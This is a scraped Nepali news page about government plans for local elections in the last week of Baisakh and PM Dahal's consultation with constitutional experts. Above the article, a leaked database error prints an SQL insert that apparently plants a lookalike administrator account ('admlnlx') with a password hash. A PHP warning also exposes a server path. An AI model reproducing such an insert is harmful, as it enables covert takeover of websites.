WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BItHhP6o4fNtiPWt3RVbR5.m9w/Bsg.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-17 22:40:07', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
मिति नतोकी वैशाख अन्तिम हप्ता चुनाव घोषणा गर्ने सरकारको तयारी, संविधानविदसँग परामर्श – Gaule Khabar

मिति नतोकी वैशाख अन्तिम हप्ता चुनाव घोषणा गर्ने सरकारको तयारी, संविधानविदसँग परामर्श

मिति नतोकी वैशाख अन्तिम हप्ता चुनाव घोषणा गर्ने सरकारको तयारी, संविधानविदसँग परामर्श

काठमाडौं, माघ १९ –

सरकारले वैशाख अन्तिम हप्ता स्थानीय तहको चुनाव गर्नेगरी निर्वाचन आयोगलाई पत्र पठाउने तयारी गरेको छ । बिहीबार बस्ने मन्त्रिपरिषद बैठकले वैशाख अन्तिम हप्ता चुनाव गर्ने घोषणा गर्न लागेको हो ।

मिति घोषणा नगर्ने तर वैशाख अन्तिम हप्ता चुनाव गर्ने गरी आयोगलाई तयारी थाल्न पत्र पठाउने तयारी भइरहेको प्रधानमन्त्री निकट स्रोतले जनाएको छ । यसैबिच प्रधानमन्त्री पुष्पकमल दाहालले स्थानीय तह पूनर्संरचना आयोगले सरकारलाई बुझाएको प्रतिवेदनबारे संविधानविदसँग परामर्श गर्नुभएको छ ।

सत्तारुढ दलका प्रमुख नेताहरुको उपस्थितिमा प्रधानमन्त्री दाहालले संविधानविदसँग परामर्श गर्नुभएको हो । परामर्शमा उहाँले स्थानीय तह पूनर्संरचना आयोगले बुझाएको प्रतिवेदनलाई सवर्स्वीकार्य बनाउने विधि र कानुनी व्यवस्थाबारे संविधानविदसँग राय माग्नुभएको थियो ।
त्यस क्रममा संविधानविदले सरकारले तोकेको मापदण्ड र कार्यादेश अनुसार सुझाव मात्रै पेश गर्ने अधिकार आयोगको भएकाले सरकारले आवश्यकताअनुसार प्रतिवेदन परिमार्जन गर्नसक्ने सुझाव दिएका प्रधानमन्त्रीको निजी सचिवालयले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका